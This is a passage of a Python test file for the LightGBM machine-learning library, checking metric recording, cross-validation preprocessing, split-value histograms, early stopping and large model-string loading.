        ([0.0, 1.0, 2.0, 3.0], 1.5),
        ([-1.0, 1.0, -2.0, 2.0], 0.0),
    ):
        check_constant_features(y_true, expected, params)
def test_constant_features_binary():
    """With a constant feature, binary classification must predict the
    positive-class frequency."""
    params = {'objective': 'binary'}
    for y_true, expected in (
        ([0.0, 10.0, 0.0, 10.0], 0.5),
        ([0.0, 1.0, 2.0, 3.0], 0.75),
    ):
        check_constant_features(y_true, expected, params)
def test_constant_features_multiclass():
    """With a constant feature, multiclass must predict class frequencies."""
    params = {'objective': 'multiclass', 'num_class': 3}
    for y_true, expected in (
        ([0.0, 1.0, 2.0, 0.0], [0.5, 0.25, 0.25]),
        ([0.0, 1.0, 2.0, 1.0], [0.25, 0.5, 0.25]),
    ):
        check_constant_features(y_true, expected, params)
def test_constant_features_multiclassova():
    """With a constant feature, one-vs-all multiclass must predict class
    frequencies, matching plain multiclass behavior."""
    params = {'objective': 'multiclassova', 'num_class': 3}
    for y_true, expected in (
        ([0.0, 1.0, 2.0, 0.0], [0.5, 0.25, 0.25]),
        ([0.0, 1.0, 2.0, 1.0], [0.25, 0.5, 0.25]),
    ):
        check_constant_features(y_true, expected, params)
def test_fpreproc():
    """Check that the `fpreproc` callback of lgb.cv is applied to each fold:
    it may rewrite the train/validation Datasets and params (here adding a
    4th class), and CV must report metrics for the rewritten problem."""
    def preprocess_data(dtrain, dtest, params):
        # shift the first feature, relabel the last 5 samples of each fold to
        # a brand-new class 3, rebuild the Datasets, and bump num_class to 4
        train_data = dtrain.construct().get_data()
        test_data = dtest.construct().get_data()
        train_data[:, 0] += 1
        test_data[:, 0] += 1
        dtrain.label[-5:] = 3
        dtest.label[-5:] = 3
        dtrain = lgb.Dataset(train_data, dtrain.label)
        dtest = lgb.Dataset(test_data, dtest.label, reference=dtrain)
        params['num_class'] = 4
        return dtrain, dtest, params
    X, y = load_iris(return_X_y=True)
    dataset = lgb.Dataset(X, y, free_raw_data=False)
    # original problem has 3 classes; fpreproc grows it to 4 per fold
    params = {'objective': 'multiclass', 'num_class': 3, 'verbose': -1}
    results = lgb.cv(params, dataset, num_boost_round=10, fpreproc=preprocess_data)
    assert 'multi_logloss-mean' in results
    assert len(results['multi_logloss-mean']) == 10
def test_metrics():
    """Exhaustively check which metrics lgb.cv and lgb.train record under
    every combination of: metric given in params vs. in args, custom
    objective (fobj), custom metric (feval), the 'None' metric aliases, and
    multiclass objectives/aliases with valid and invalid num_class."""
    X, y = load_digits(n_class=2, return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    lgb_train = lgb.Dataset(X_train, y_train, silent=True)
    lgb_valid = lgb.Dataset(X_test, y_test, reference=lgb_train, silent=True)
    evals_result = {}
    params_verbose = {'verbose': -1}
    params_obj_verbose = {'objective': 'binary', 'verbose': -1}
    params_obj_metric_log_verbose = {'objective': 'binary', 'metric': 'binary_logloss', 'verbose': -1}
    params_obj_metric_err_verbose = {'objective': 'binary', 'metric': 'binary_error', 'verbose': -1}
    params_obj_metric_inv_verbose = {'objective': 'binary', 'metric': 'invalid_metric', 'verbose': -1}
    params_obj_metric_multi_verbose = {'objective': 'binary',
                                       'metric': ['binary_logloss', 'binary_error'],
                                       'verbose': -1}
    params_obj_metric_none_verbose = {'objective': 'binary', 'metric': 'None', 'verbose': -1}
    params_metric_log_verbose = {'metric': 'binary_logloss', 'verbose': -1}
    params_metric_err_verbose = {'metric': 'binary_error', 'verbose': -1}
    params_metric_inv_verbose = {'metric_types': 'invalid_metric', 'verbose': -1}
    params_metric_multi_verbose = {'metric': ['binary_logloss', 'binary_error'], 'verbose': -1}
    params_metric_none_verbose = {'metric': 'None', 'verbose': -1}
    # helper: short CV run, returns the results dict
    def get_cv_result(params=params_obj_verbose, **kwargs):
        return lgb.cv(params, lgb_train, num_boost_round=2, verbose_eval=False, **kwargs)
    # helper: short training run, records metrics into the shared evals_result
    def train_booster(params=params_obj_verbose, **kwargs):
        lgb.train(params, lgb_train,
                  num_boost_round=2,
                  valid_sets=[lgb_valid],
                  evals_result=evals_result,
                  verbose_eval=False, **kwargs)
    # no fobj, no feval
    # default metric
    res = get_cv_result()
    assert len(res) == 2
    assert 'binary_logloss-mean' in res
    # non-default metric in params
    res = get_cv_result(params=params_obj_metric_err_verbose)
    assert len(res) == 2
    assert 'binary_error-mean' in res
    # default metric in args
    res = get_cv_result(metrics='binary_logloss')
    assert len(res) == 2
    assert 'binary_logloss-mean' in res
    # non-default metric in args
    res = get_cv_result(metrics='binary_error')
    assert len(res) == 2
    assert 'binary_error-mean' in res
    # metric in args overwrites one in params
    res = get_cv_result(params=params_obj_metric_inv_verbose, metrics='binary_error')
    assert len(res) == 2
    assert 'binary_error-mean' in res
    # multiple metrics in params
    res = get_cv_result(params=params_obj_metric_multi_verbose)
    assert len(res) == 4
    assert 'binary_logloss-mean' in res
    assert 'binary_error-mean' in res
    # multiple metrics in args
    res = get_cv_result(metrics=['binary_logloss', 'binary_error'])
    assert len(res) == 4
    assert 'binary_logloss-mean' in res
    assert 'binary_error-mean' in res
    # remove default metric by 'None' in list
    res = get_cv_result(metrics=['None'])
    assert len(res) == 0
    # remove default metric by 'None' aliases
    for na_alias in ('None', 'na', 'null', 'custom'):
        res = get_cv_result(metrics=na_alias)
        assert len(res) == 0
    # fobj, no feval
    # no default metric
    res = get_cv_result(params=params_verbose, fobj=dummy_obj)
    assert len(res) == 0
    # metric in params
    res = get_cv_result(params=params_metric_err_verbose, fobj=dummy_obj)
    assert len(res) == 2
    assert 'binary_error-mean' in res
    # metric in args
    res = get_cv_result(params=params_verbose, fobj=dummy_obj, metrics='binary_error')
    assert len(res) == 2
    assert 'binary_error-mean' in res
    # metric in args overwrites its' alias in params
    res = get_cv_result(params=params_metric_inv_verbose, fobj=dummy_obj, metrics='binary_error')
    assert len(res) == 2
    assert 'binary_error-mean' in res
    # multiple metrics in params
    res = get_cv_result(params=params_metric_multi_verbose, fobj=dummy_obj)
    assert len(res) == 4
    assert 'binary_logloss-mean' in res
    assert 'binary_error-mean' in res
    # multiple metrics in args
    res = get_cv_result(params=params_verbose, fobj=dummy_obj,
                        metrics=['binary_logloss', 'binary_error'])
    assert len(res) == 4
    assert 'binary_logloss-mean' in res
    assert 'binary_error-mean' in res
    # no fobj, feval
    # default metric with custom one
    res = get_cv_result(feval=constant_metric)
    assert len(res) == 4
    assert 'binary_logloss-mean' in res
    assert 'error-mean' in res
    # non-default metric in params with custom one
    res = get_cv_result(params=params_obj_metric_err_verbose, feval=constant_metric)
    assert len(res) == 4
    assert 'binary_error-mean' in res
    assert 'error-mean' in res
    # default metric in args with custom one
    res = get_cv_result(metrics='binary_logloss', feval=constant_metric)
    assert len(res) == 4
    assert 'binary_logloss-mean' in res
    assert 'error-mean' in res
    # non-default metric in args with custom one
    res = get_cv_result(metrics='binary_error', feval=constant_metric)
    assert len(res) == 4
    assert 'binary_error-mean' in res
    assert 'error-mean' in res
    # metric in args overwrites one in params, custom one is evaluated too
    res = get_cv_result(params=params_obj_metric_inv_verbose, metrics='binary_error', feval=constant_metric)
    assert len(res) == 4
    assert 'binary_error-mean' in res
    assert 'error-mean' in res
    # multiple metrics in params with custom one
    res = get_cv_result(params=params_obj_metric_multi_verbose, feval=constant_metric)
    assert len(res) == 6
    assert 'binary_logloss-mean' in res
    assert 'binary_error-mean' in res
    assert 'error-mean' in res
    # multiple metrics in args with custom one
    res = get_cv_result(metrics=['binary_logloss', 'binary_error'], feval=constant_metric)
    assert len(res) == 6
    assert 'binary_logloss-mean' in res
    assert 'binary_error-mean' in res
    assert 'error-mean' in res
    # custom metric is evaluated despite 'None' is passed
    res = get_cv_result(metrics=['None'], feval=constant_metric)
    assert len(res) == 2
    assert 'error-mean' in res
    # fobj, feval
    # no default metric, only custom one
    res = get_cv_result(params=params_verbose, fobj=dummy_obj, feval=constant_metric)
    assert len(res) == 2
    assert 'error-mean' in res
    # metric in params with custom one
    res = get_cv_result(params=params_metric_err_verbose, fobj=dummy_obj, feval=constant_metric)
    assert len(res) == 4
    assert 'binary_error-mean' in res
    assert 'error-mean' in res
    # metric in args with custom one
    res = get_cv_result(params=params_verbose, fobj=dummy_obj,
                        feval=constant_metric, metrics='binary_error')
    assert len(res) == 4
    assert 'binary_error-mean' in res
    assert 'error-mean' in res
    # metric in args overwrites one in params, custom one is evaluated too
    res = get_cv_result(params=params_metric_inv_verbose, fobj=dummy_obj,
                        feval=constant_metric, metrics='binary_error')
    assert len(res) == 4
    assert 'binary_error-mean' in res
    assert 'error-mean' in res
    # multiple metrics in params with custom one
    res = get_cv_result(params=params_metric_multi_verbose, fobj=dummy_obj, feval=constant_metric)
    assert len(res) == 6
    assert 'binary_logloss-mean' in res
    assert 'binary_error-mean' in res
    assert 'error-mean' in res
    # multiple metrics in args with custom one
    res = get_cv_result(params=params_verbose, fobj=dummy_obj, feval=constant_metric,
                        metrics=['binary_logloss', 'binary_error'])
    assert len(res) == 6
    assert 'binary_logloss-mean' in res
    assert 'binary_error-mean' in res
    assert 'error-mean' in res
    # custom metric is evaluated despite 'None' is passed
    res = get_cv_result(params=params_metric_none_verbose, fobj=dummy_obj, feval=constant_metric)
    assert len(res) == 2
    assert 'error-mean' in res
    # no fobj, no feval
    # default metric
    train_booster()
    assert len(evals_result['valid_0']) == 1
    assert 'binary_logloss' in evals_result['valid_0']
    # default metric in params
    train_booster(params=params_obj_metric_log_verbose)
    assert len(evals_result['valid_0']) == 1
    assert 'binary_logloss' in evals_result['valid_0']
    # non-default metric in params
    train_booster(params=params_obj_metric_err_verbose)
    assert len(evals_result['valid_0']) == 1
    assert 'binary_error' in evals_result['valid_0']
    # multiple metrics in params
    train_booster(params=params_obj_metric_multi_verbose)
    assert len(evals_result['valid_0']) == 2
    assert 'binary_logloss' in evals_result['valid_0']
    assert 'binary_error' in evals_result['valid_0']
    # remove default metric by 'None' aliases
    for na_alias in ('None', 'na', 'null', 'custom'):
        params = {'objective': 'binary', 'metric': na_alias, 'verbose': -1}
        train_booster(params=params)
        assert len(evals_result) == 0
    # fobj, no feval
    # no default metric
    train_booster(params=params_verbose, fobj=dummy_obj)
    assert len(evals_result) == 0
    # metric in params
    train_booster(params=params_metric_log_verbose, fobj=dummy_obj)
    assert len(evals_result['valid_0']) == 1
    assert 'binary_logloss' in evals_result['valid_0']
    # multiple metrics in params
    train_booster(params=params_metric_multi_verbose, fobj=dummy_obj)
    assert len(evals_result['valid_0']) == 2
    assert 'binary_logloss' in evals_result['valid_0']
    assert 'binary_error' in evals_result['valid_0']
    # no fobj, feval
    # default metric with custom one
    train_booster(feval=constant_metric)
    assert len(evals_result['valid_0']) == 2
    assert 'binary_logloss' in evals_result['valid_0']
    assert 'error' in evals_result['valid_0']
    # default metric in params with custom one
    train_booster(params=params_obj_metric_log_verbose, feval=constant_metric)
    assert len(evals_result['valid_0']) == 2
    assert 'binary_logloss' in evals_result['valid_0']
    assert 'error' in evals_result['valid_0']
    # non-default metric in params with custom one
    train_booster(params=params_obj_metric_err_verbose, feval=constant_metric)
    assert len(evals_result['valid_0']) == 2
    assert 'binary_error' in evals_result['valid_0']
    assert 'error' in evals_result['valid_0']
    # multiple metrics in params with custom one
    train_booster(params=params_obj_metric_multi_verbose, feval=constant_metric)
    assert len(evals_result['valid_0']) == 3
    assert 'binary_logloss' in evals_result['valid_0']
    assert 'binary_error' in evals_result['valid_0']
    assert 'error' in evals_result['valid_0']
    # custom metric is evaluated despite 'None' is passed
    train_booster(params=params_obj_metric_none_verbose, feval=constant_metric)
    assert len(evals_result) == 1
    assert 'error' in evals_result['valid_0']
    # fobj, feval
    # no default metric, only custom one
    train_booster(params=params_verbose, fobj=dummy_obj, feval=constant_metric)
    assert len(evals_result['valid_0']) == 1
    assert 'error' in evals_result['valid_0']
    # metric in params with custom one
    train_booster(params=params_metric_log_verbose, fobj=dummy_obj, feval=constant_metric)
    assert len(evals_result['valid_0']) == 2
    assert 'binary_logloss' in evals_result['valid_0']
    assert 'error' in evals_result['valid_0']
    # multiple metrics in params with custom one
    train_booster(params=params_metric_multi_verbose, fobj=dummy_obj, feval=constant_metric)
    assert len(evals_result['valid_0']) == 3
    assert 'binary_logloss' in evals_result['valid_0']
    assert 'binary_error' in evals_result['valid_0']
    assert 'error' in evals_result['valid_0']
    # custom metric is evaluated despite 'None' is passed
    train_booster(params=params_metric_none_verbose, fobj=dummy_obj, feval=constant_metric)
    assert len(evals_result) == 1
    assert 'error' in evals_result['valid_0']
    # switch to a 3-class problem to exercise multiclass objectives/aliases
    X, y = load_digits(n_class=3, return_X_y=True)
    lgb_train = lgb.Dataset(X, y, silent=True)
    obj_multi_aliases = ['multiclass', 'softmax', 'multiclassova', 'multiclass_ova', 'ova', 'ovr']
    for obj_multi_alias in obj_multi_aliases:
        params_obj_class_3_verbose = {'objective': obj_multi_alias, 'num_class': 3, 'verbose': -1}
        params_obj_class_1_verbose = {'objective': obj_multi_alias, 'num_class': 1, 'verbose': -1}
        params_obj_verbose = {'objective': obj_multi_alias, 'verbose': -1}
        # multiclass default metric
        res = get_cv_result(params_obj_class_3_verbose)
        assert len(res) == 2
        assert 'multi_logloss-mean' in res
        # multiclass default metric with custom one
        res = get_cv_result(params_obj_class_3_verbose, feval=constant_metric)
        assert len(res) == 4
        assert 'multi_logloss-mean' in res
        assert 'error-mean' in res
        # multiclass metric alias with custom one for custom objective
        res = get_cv_result(params_obj_class_3_verbose, fobj=dummy_obj, feval=constant_metric)
        assert len(res) == 2
        assert 'error-mean' in res
        # no metric for invalid class_num
        res = get_cv_result(params_obj_class_1_verbose, fobj=dummy_obj)
        assert len(res) == 0
        # custom metric for invalid class_num
        res = get_cv_result(params_obj_class_1_verbose, fobj=dummy_obj, feval=constant_metric)
        assert len(res) == 2
        assert 'error-mean' in res
        # multiclass metric alias with custom one with invalid class_num
        with pytest.raises(lgb.basic.LightGBMError):
            get_cv_result(params_obj_class_1_verbose, metrics=obj_multi_alias,
                          fobj=dummy_obj, feval=constant_metric)
        # multiclass default metric without num_class
        with pytest.raises(lgb.basic.LightGBMError):
            get_cv_result(params_obj_verbose)
        for metric_multi_alias in obj_multi_aliases + ['multi_logloss']:
            # multiclass metric alias
            res = get_cv_result(params_obj_class_3_verbose, metrics=metric_multi_alias)
            assert len(res) == 2
            assert 'multi_logloss-mean' in res
        # multiclass metric
        res = get_cv_result(params_obj_class_3_verbose, metrics='multi_error')
        assert len(res) == 2
        assert 'multi_error-mean' in res
        # non-valid metric for multiclass objective
        with pytest.raises(lgb.basic.LightGBMError):
            get_cv_result(params_obj_class_3_verbose, metrics='binary_logloss')
    params_class_3_verbose = {'num_class': 3, 'verbose': -1}
    # non-default num_class for default objective
    with pytest.raises(lgb.basic.LightGBMError):
        get_cv_result(params_class_3_verbose)
    # no metric with non-default num_class for custom objective
    res = get_cv_result(params_class_3_verbose, fobj=dummy_obj)
    assert len(res) == 0
    for metric_multi_alias in obj_multi_aliases + ['multi_logloss']:
        # multiclass metric alias for custom objective
        res = get_cv_result(params_class_3_verbose, metrics=metric_multi_alias, fobj=dummy_obj)
        assert len(res) == 2
        assert 'multi_logloss-mean' in res
    # multiclass metric for custom objective
    res = get_cv_result(params_class_3_verbose, metrics='multi_error', fobj=dummy_obj)
    assert len(res) == 2
    assert 'multi_error-mean' in res
    # binary metric with non-default num_class for custom objective
    with pytest.raises(lgb.basic.LightGBMError):
        get_cv_result(params_class_3_verbose, metrics='binary_error', fobj=dummy_obj)
def test_multiple_feval_train():
    """Passing a list of custom eval functions to lgb.train must record the
    built-in metric plus each custom metric in evals_result."""
    X, y = load_breast_cancer(return_X_y=True)
    X_train, X_validation, y_train, y_validation = train_test_split(X, y, test_size=0.2)
    train_dataset = lgb.Dataset(data=X_train, label=y_train, silent=True)
    validation_dataset = lgb.Dataset(data=X_validation, label=y_validation, reference=train_dataset, silent=True)
    params = {'verbose': -1, 'objective': 'binary', 'metric': 'binary_logloss'}
    evals_result = {}
    lgb.train(
        params=params,
        train_set=train_dataset,
        valid_sets=validation_dataset,
        num_boost_round=5,
        feval=[constant_metric, decreasing_metric],
        evals_result=evals_result)
    recorded = evals_result['valid_0']
    assert len(recorded) == 3
    for metric_name in ('binary_logloss', 'error', 'decreasing_metric'):
        assert metric_name in recorded
def test_multiple_feval_cv():
    """Passing a list of custom eval functions to lgb.cv must record a mean
    and a stdv entry for the built-in metric and each custom metric."""
    X, y = load_breast_cancer(return_X_y=True)
    params = {'verbose': -1, 'objective': 'binary', 'metric': 'binary_logloss'}
    cv_results = lgb.cv(
        params=params,
        train_set=lgb.Dataset(data=X, label=y, silent=True),
        num_boost_round=5,
        feval=[constant_metric, decreasing_metric])
    # three metrics, each contributing a mean and a stdv entry
    assert len(cv_results) == 6
    for metric_name in ('binary_logloss', 'error', 'decreasing_metric'):
        assert f'{metric_name}-mean' in cv_results
        assert f'{metric_name}-stdv' in cv_results
@pytest.mark.skipif(psutil.virtual_memory().available / 1024 / 1024 / 1024 < 3, reason='not enough RAM')
def test_model_size():
    """Check that a model string longer than 2**31 characters (past the int32
    limit) can be loaded back with model_from_string and still predicts the
    same values as the original 2-tree model."""
    X, y = load_boston(return_X_y=True)
    data = lgb.Dataset(X, y)
    bst = lgb.train({'verbose': -1}, data, num_boost_round=2)
    y_pred = bst.predict(X)
    model_str = bst.model_to_string()
    one_tree = model_str[model_str.find('Tree=1'):model_str.find('end of trees')]
    one_tree_size = len(one_tree)
    one_tree = one_tree.replace('Tree=1', 'Tree={}')
    multiplier = 100
    total_trees = multiplier + 2
    try:
        # duplicate one tree `multiplier` times, then pad the model string
        # with spaces so its total length exceeds 2**31 characters
        before_tree_sizes = model_str[:model_str.find('tree_sizes')]
        trees = model_str[model_str.find('Tree=0'):model_str.find('end of trees')]
        more_trees = (one_tree * multiplier).format(*range(2, total_trees))
        after_trees = model_str[model_str.find('end of trees'):]
        num_end_spaces = 2**31 - one_tree_size * total_trees
        new_model_str = f"{before_tree_sizes}\n\n{trees}{more_trees}{after_trees}{'':{num_end_spaces}}"
        assert len(new_model_str) > 2**31
        bst.model_from_string(new_model_str, verbose=False)
        assert bst.num_trees() == total_trees
        y_pred_new = bst.predict(X, num_iteration=2)
        np.testing.assert_allclose(y_pred, y_pred_new)
    except MemoryError:
        # Fix: `pytest.skipTest` does not exist (`skipTest` is a unittest
        # TestCase method) and would raise AttributeError instead of skipping;
        # pytest.skip() is the correct runtime-skip call.
        pytest.skip('not enough RAM')
def test_get_split_value_histogram():
    """Exercise Booster.get_split_value_histogram in both output styles.

    Checks the XGBoost-style (2-column) return shape for various `bins`
    values, the numpy-style (hist, bin_edges) return, lookup by feature
    index vs. feature name, string-valued `bins`, and that histograms are
    rejected for categorical features.
    """
    X, y = load_boston(return_X_y=True)
    # Feature 2 is declared categorical so the rejection check at the
    # bottom of this test has a categorical feature to query.
    lgb_train = lgb.Dataset(X, y, categorical_feature=[2])
    gbm = lgb.train({'verbose': -1}, lgb_train, num_boost_round=20)
    # test XGBoost-style return value
    params = {'feature': 0, 'xgboost_style': True}
    assert gbm.get_split_value_histogram(**params).shape == (9, 2)
    assert gbm.get_split_value_histogram(bins=999, **params).shape == (9, 2)
    assert gbm.get_split_value_histogram(bins=-1, **params).shape == (1, 2)
    assert gbm.get_split_value_histogram(bins=0, **params).shape == (1, 2)
    assert gbm.get_split_value_histogram(bins=1, **params).shape == (1, 2)
    assert gbm.get_split_value_histogram(bins=2, **params).shape == (2, 2)
    assert gbm.get_split_value_histogram(bins=6, **params).shape == (5, 2)
    assert gbm.get_split_value_histogram(bins=7, **params).shape == (6, 2)
    # Index-based and name-based lookups must agree; the pandas branch
    # compares DataFrames via .values, the fallback compares raw arrays.
    if lgb.compat.PANDAS_INSTALLED:
        np.testing.assert_allclose(
            gbm.get_split_value_histogram(0, xgboost_style=True).values,
            gbm.get_split_value_histogram(gbm.feature_name()[0], xgboost_style=True).values
        )
        np.testing.assert_allclose(
            gbm.get_split_value_histogram(X.shape[-1] - 1, xgboost_style=True).values,
            gbm.get_split_value_histogram(gbm.feature_name()[X.shape[-1] - 1], xgboost_style=True).values
        )
    else:
        np.testing.assert_allclose(
            gbm.get_split_value_histogram(0, xgboost_style=True),
            gbm.get_split_value_histogram(gbm.feature_name()[0], xgboost_style=True)
        )
        np.testing.assert_allclose(
            gbm.get_split_value_histogram(X.shape[-1] - 1, xgboost_style=True),
            gbm.get_split_value_histogram(gbm.feature_name()[X.shape[-1] - 1], xgboost_style=True)
        )
    # test numpy-style return value
    hist, bins = gbm.get_split_value_histogram(0)
    assert len(hist) == 23
    assert len(bins) == 24
    hist, bins = gbm.get_split_value_histogram(0, bins=999)
    assert len(hist) == 999
    assert len(bins) == 1000
    # Non-positive bin counts are rejected in numpy-style mode (unlike the
    # XGBoost-style calls above, which clamp instead).
    with pytest.raises(ValueError):
        gbm.get_split_value_histogram(0, bins=-1)
    with pytest.raises(ValueError):
        gbm.get_split_value_histogram(0, bins=0)
    hist, bins = gbm.get_split_value_histogram(0, bins=1)
    assert len(hist) == 1
    assert len(bins) == 2
    hist, bins = gbm.get_split_value_histogram(0, bins=2)
    assert len(hist) == 2
    assert len(bins) == 3
    hist, bins = gbm.get_split_value_histogram(0, bins=6)
    assert len(hist) == 6
    assert len(bins) == 7
    hist, bins = gbm.get_split_value_histogram(0, bins=7)
    assert len(hist) == 7
    assert len(bins) == 8
    hist_idx, bins_idx = gbm.get_split_value_histogram(0)
    hist_name, bins_name = gbm.get_split_value_histogram(gbm.feature_name()[0])
    np.testing.assert_array_equal(hist_idx, hist_name)
    np.testing.assert_allclose(bins_idx, bins_name)
    hist_idx, bins_idx = gbm.get_split_value_histogram(X.shape[-1] - 1)
    hist_name, bins_name = gbm.get_split_value_histogram(gbm.feature_name()[X.shape[-1] - 1])
    np.testing.assert_array_equal(hist_idx, hist_name)
    np.testing.assert_allclose(bins_idx, bins_name)
    # test bins string type
    if np.__version__ > '1.11.0':
        hist_vals, bin_edges = gbm.get_split_value_histogram(0, bins='auto')
        hist = gbm.get_split_value_histogram(0, bins='auto', xgboost_style=True)
        if lgb.compat.PANDAS_INSTALLED:
            # XGBoost-style output keeps only non-empty bins.
            mask = hist_vals > 0
            np.testing.assert_array_equal(hist_vals[mask], hist['Count'].values)
            np.testing.assert_allclose(bin_edges[1:][mask], hist['SplitValue'].values)
        else:
            mask = hist_vals > 0
            np.testing.assert_array_equal(hist_vals[mask], hist[:, 1])
            np.testing.assert_allclose(bin_edges[1:][mask], hist[:, 0])
    # test histogram is disabled for categorical features
    with pytest.raises(lgb.basic.LightGBMError):
        gbm.get_split_value_histogram(2)
def test_early_stopping_for_only_first_metric():
    """Check `first_metric_only` early stopping for lgb.train and lgb.cv.

    Each helper trains with early_stopping_rounds=5 and asserts that the
    stopping iteration matches the (empirically observed) iteration for
    the metric, or combination of metrics, being monitored.
    """
    def metrics_combination_train_regression(valid_sets, metric_list, assumed_iteration,
                                             first_metric_only, feval=None):
        # Train a small regression model; best_iteration must equal the
        # iteration expected for the monitored metric(s).
        params = {
            'objective': 'regression',
            'learning_rate': 1.1,
            'num_leaves': 10,
            'metric': metric_list,
            'verbose': -1,
            'seed': 123
        }
        gbm = lgb.train(dict(params, first_metric_only=first_metric_only), lgb_train,
                        num_boost_round=25, valid_sets=valid_sets, feval=feval,
                        early_stopping_rounds=5, verbose_eval=False)
        assert assumed_iteration == gbm.best_iteration
    def metrics_combination_cv_regression(metric_list, assumed_iteration,
                                          first_metric_only, eval_train_metric, feval=None):
        # Same check for lgb.cv: the number of recorded rounds in any
        # result entry equals the stopping iteration.
        params = {
            'objective': 'regression',
            'learning_rate': 0.9,
            'num_leaves': 10,
            'metric': metric_list,
            'verbose': -1,
            'seed': 123,
            'gpu_use_dp': True
        }
        ret = lgb.cv(dict(params, first_metric_only=first_metric_only),
                     train_set=lgb_train, num_boost_round=25,
                     stratified=False, feval=feval,
                     early_stopping_rounds=5, verbose_eval=False,
                     eval_train_metric=eval_train_metric)
        assert assumed_iteration == len(ret[list(ret.keys())[0]])
    X, y = load_boston(return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
    X_test1, X_test2, y_test1, y_test2 = train_test_split(X_test, y_test, test_size=0.5, random_state=73)
    lgb_train = lgb.Dataset(X_train, y_train)
    lgb_valid1 = lgb.Dataset(X_test1, y_test1, reference=lgb_train)
    lgb_valid2 = lgb.Dataset(X_test2, y_test2, reference=lgb_train)
    # Empirically observed stop iterations per valid set / metric; they
    # must all differ so the assertions below can tell the metrics apart.
    iter_valid1_l1 = 3
    iter_valid1_l2 = 14
    iter_valid2_l1 = 2
    iter_valid2_l2 = 15
    assert len(set([iter_valid1_l1, iter_valid1_l2, iter_valid2_l1, iter_valid2_l2])) == 4
    iter_min_l1 = min([iter_valid1_l1, iter_valid2_l1])
    iter_min_l2 = min([iter_valid1_l2, iter_valid2_l2])
    iter_min_valid1 = min([iter_valid1_l1, iter_valid1_l2])
    iter_cv_l1 = 4
    iter_cv_l2 = 12
    assert len(set([iter_cv_l1, iter_cv_l2])) == 2
    iter_cv_min = min([iter_cv_l1, iter_cv_l2])
    # test for lgb.train
    metrics_combination_train_regression(lgb_valid1, [], iter_valid1_l2, False)
    metrics_combination_train_regression(lgb_valid1, [], iter_valid1_l2, True)
    metrics_combination_train_regression(lgb_valid1, None, iter_valid1_l2, False)
    metrics_combination_train_regression(lgb_valid1, None, iter_valid1_l2, True)
    metrics_combination_train_regression(lgb_valid1, 'l2', iter_valid1_l2, True)
    metrics_combination_train_regression(lgb_valid1, 'l1', iter_valid1_l1, True)
    metrics_combination_train_regression(lgb_valid1, ['l2', 'l1'], iter_valid1_l2, True)
    metrics_combination_train_regression(lgb_valid1, ['l1', 'l2'], iter_valid1_l1, True)
    metrics_combination_train_regression(lgb_valid1, ['l2', 'l1'], iter_min_valid1, False)
    metrics_combination_train_regression(lgb_valid1, ['l1', 'l2'], iter_min_valid1, False)
    # test feval for lgb.train
    metrics_combination_train_regression(lgb_valid1, 'None', 1, False,
                                         feval=lambda preds, train_data: [decreasing_metric(preds, train_data),
                                                                          constant_metric(preds, train_data)])
    metrics_combination_train_regression(lgb_valid1, 'None', 25, True,
                                         feval=lambda preds, train_data: [decreasing_metric(preds, train_data),
                                                                          constant_metric(preds, train_data)])
    metrics_combination_train_regression(lgb_valid1, 'None', 1, True,
                                         feval=lambda preds, train_data: [constant_metric(preds, train_data),
                                                                          decreasing_metric(preds, train_data)])
    # test with two valid data for lgb.train
    metrics_combination_train_regression([lgb_valid1, lgb_valid2], ['l2', 'l1'], iter_min_l2, True)
    metrics_combination_train_regression([lgb_valid2, lgb_valid1], ['l2', 'l1'], iter_min_l2, True)
    metrics_combination_train_regression([lgb_valid1, lgb_valid2], ['l1', 'l2'], iter_min_l1, True)
    metrics_combination_train_regression([lgb_valid2, lgb_valid1], ['l1', 'l2'], iter_min_l1, True)
    # test for lgb.cv
    metrics_combination_cv_regression(None, iter_cv_l2, True, False)
    metrics_combination_cv_regression('l2', iter_cv_l2, True, False)
    metrics_combination_cv_regression('l1', iter_cv_l1, True, False)
    metrics_combination_cv_regression(['l2', 'l1'], iter_cv_l2, True, False)
    metrics_combination_cv_regression(['l1', 'l2'], iter_cv_l1, True, False)
    metrics_combination_cv_regression(['l2', 'l1'], iter_cv_min, False, False)
    metrics_combination_cv_regression(['l1', 'l2'], iter_cv_min, False, False)
    metrics_combination_cv_regression(None, iter_cv_l2, True, True)
    metrics_combination_cv_regression('l2', iter_cv_l2, True, True)
    metrics_combination_cv_regression('l1', iter_cv_l1, True, True)
    metrics_combination_cv_regression(['l2', 'l1'], iter_cv_l2, True, True)
    metrics_combination_cv_regression(['l1', 'l2'], iter_cv_l1, True, True)
    metrics_combination_cv_regression(['l2', 'l1'], iter_cv_min, False, True)
    metrics_combination_cv_regression(['l1', 'l2'], iter_cv_min, False, True)
    # test feval for lgb.cv
    metrics_combination_cv_regression('None', 1, False, False,
                                      feval=lambda preds, train_data: [decreasing_metric(preds, train_data),
                                                                       constant_metric(preds, train_data)])
    metrics_combination_cv_regression('None', 25, True, False,
                                      feval=lambda preds, train_data: [decreasing_metric(preds, train_data),
                                                                       constant_metric(preds, train_data)])
    metrics_combination_cv_regression('None', 1, True, False,
                                      feval=lambda preds, train_data: [constant_metric(preds, train_data),
                                                                       decreasing_metric(preds, train_data)])
def test_node_level_subcol():
    """feature_fraction_bynode samples features per node and changes the model."""
    X, y = load_breast_cancer(return_X_y=True)
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
    train_params = {
        'objective': 'binary',
        'metric': 'binary_logloss',
        'feature_fraction_bynode': 0.8,
        'feature_fraction': 1.0,
        'verbose': -1
    }
    dtrain = lgb.Dataset(X_train, y_train)
    dvalid = lgb.Dataset(X_test, y_test, reference=dtrain)
    history = {}
    booster = lgb.train(train_params, dtrain,
                        num_boost_round=25,
                        valid_sets=dvalid,
                        verbose_eval=False,
                        evals_result=history)
    loss = log_loss(y_test, booster.predict(X_test))
    assert loss < 0.14
    # The recorded eval history must match the recomputed log-loss.
    assert history['valid_0']['binary_logloss'][-1] == pytest.approx(loss)
    # Adding per-tree feature sampling on top must yield a different model.
    train_params['feature_fraction'] = 0.5
    booster_combined = lgb.train(train_params, dtrain, num_boost_round=25)
    assert loss != log_loss(y_test, booster_combined.predict(X_test))
def test_forced_bins():
    """Bin boundaries supplied via `forcedbins_filename` must be respected.

    Uses the forced-bins example files shipped in examples/regression and
    checks prediction granularity with and without forced boundaries.
    """
    x = np.empty((100, 2))
    x[:, 0] = np.arange(0, 1, 0.01)
    x[:, 1] = -np.arange(0, 1, 0.01)
